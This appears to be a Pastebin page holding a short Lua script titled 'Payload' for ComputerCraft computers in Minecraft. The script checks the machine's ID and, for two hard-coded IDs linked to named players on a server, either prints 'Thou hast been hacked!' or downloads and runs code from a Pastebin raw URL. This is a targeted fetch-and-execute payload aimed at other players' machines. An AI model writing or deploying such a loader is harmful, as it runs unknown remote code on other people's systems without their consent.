Advertisement
LDDestroier

Payload

Nov 22nd, 2015
173
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.53 KB | None | 0 0
  1. local id = os.getComputerID()
  2. local function runURL(url, ...)
  3.     local program = http.get(url)
  4.     if not program then return false end
  5.     program = program.readAll()
  6.     local func = loadstring(program)
  7.     setfenv(func, getfenv())
  8.     return func(...)
  9. end
  10. local idPayloads = {
  11.     ['id437'] = function(...) --madskrillex01, on ShinexusUK
  12.         print("Thou hast been hacked!")
  13.     end,
  14.     ['id539'] = function(...) --bishop on ShinexusUK
  15.         runURL("http://pastebin.com/raw/x9ajKSc0")
  16.     end,
  17. }
  18. if idPayloads["id"..id] then
  19.         idPayloads["id"..id](...)
  20. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement